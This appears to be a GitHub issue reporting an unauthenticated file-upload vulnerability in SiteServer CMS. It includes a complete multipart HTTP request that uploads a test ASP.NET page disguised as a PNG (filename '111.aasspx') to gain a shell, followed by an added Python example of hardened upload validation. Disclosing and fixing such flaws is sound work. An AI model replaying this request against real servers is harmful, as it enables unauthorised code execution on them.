
Unauthenticated arbitrary file upload to getshell #3236

Open
@sobinge

Description

Version tested: https://github.com/siteserver/cms/releases/download/siteserver-dev-v5.0.92/siteserver_install.zip
SiteServer: v5.1
Test environment: Windows 2012 R2
Database: SQL Server 2016
Vulnerable URL: /api/stl/actions/upload/1?type=GovPublicApply
(No system configuration of the application needs to be changed during testing.)

Request body

```http
POST /api/stl/actions/upload/1?type=GovPublicApply HTTP/1.1
Host: 192.168.39.3:8099
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X_Requested_With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------307288271314916491681521187278
Content-Length: 903
Origin: http://192.168.39.3:8099
Connection: close

-----------------------------307288271314916491681521187278
Content-Disposition: form-data; name="id"

WU_FILE_0
-----------------------------307288271314916491681521187278
Content-Disposition: form-data; name="name"

111.png
-----------------------------307288271314916491681521187278
Content-Disposition: form-data; name="type"

image/png
-----------------------------307288271314916491681521187278
Content-Disposition: form-data; name="lastModifiedDate"

2021/10/15 上午10:47:51
-----------------------------307288271314916491681521187278
Content-Disposition: form-data; name="size"

5720
-----------------------------307288271314916491681521187278
Content-Disposition: form-data; name="upfile"; filename="111.aasspx"
Content-Type: image/png

<%@ Page Language="C#"%>
<% Response.Write("hello,world"); %>

-----------------------------307288271314916491681521187278--
```

The generated .aspx file name is timestamp-based; in black-box testing it can be obtained by brute-force guessing.
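The report above shows an image-upload endpoint accepting a file named `111.aasspx` that ends up stored as `.aspx`, with a storage name that can be guessed from the timestamp. The Python below is an added example of how such an endpoint should validate uploads; it is not SiteServer's code and does not reproduce the project's actual (bypassed) check. It assumes the endpoint is meant to accept images only and that the server, not the client, chooses the storage name. The sample PNG bytes and the ASP.NET payload are constructed inline for the demonstration.

```python
import os
import secrets
from pathlib import PurePosixPath, PureWindowsPath

# Added example: hardened upload validation for an image-only endpoint.
# Assumption: only these extensions are meant to be accepted here.
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}

# Leading bytes of each allowed format, checked against the real file content.
MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}

# Constructed samples: a minimal PNG header plus padding, and the same
# ASP.NET payload the report uploaded inside the multipart body.
PNG_SAMPLE = MAGIC[".png"] + b"\x00" * 16
WEBSHELL_SAMPLE = b'<%@ Page Language="C#"%>\n<% Response.Write("hello,world"); %>\n'


def client_extension(name: str) -> str:
    """Final extension of the client-supplied name, lower-cased.

    Directory components under either path convention are stripped first,
    and names containing control characters (e.g. a NUL truncation trick)
    yield an empty extension so they fail the allowlist.
    """
    if any(ord(ch) < 0x20 for ch in name):
        return ""
    base = PureWindowsPath(PurePosixPath(name).name).name
    return os.path.splitext(base)[1].lower()


def validate_upload(name: str, data: bytes) -> tuple:
    """Decide whether to store an upload.

    Returns (True, storage_name) or (False, reason). The multipart
    Content-Type and the "type" form field are deliberately not consulted:
    the report sends "image/png" for an .aspx payload, so they are untrusted.
    """
    ext = client_extension(name)
    # Allowlist on the final extension only. Anything not explicitly allowed
    # (".aspx", ".aasspx", ".png.aspx", ...) is rejected; no stripping or
    # rewriting of the name is attempted, since rewriting is what turns
    # names like "111.aasspx" back into executable extensions.
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension {ext!r} not allowed"
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match declared image format"
    # Storage name is random rather than timestamp-derived, so it cannot be
    # brute-forced the way the report describes.
    return True, secrets.token_hex(16) + ext


if __name__ == "__main__":
    for fname, blob in [("111.png", PNG_SAMPLE), ("111.aasspx", WEBSHELL_SAMPLE)]:
        print(fname, validate_upload(fname, blob))
```

This check belongs behind the authentication the endpoint is missing, not instead of it: an authenticated user uploading a valid PNG is the only request that reaches storage, and even then under a name the client never learns from a clock.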
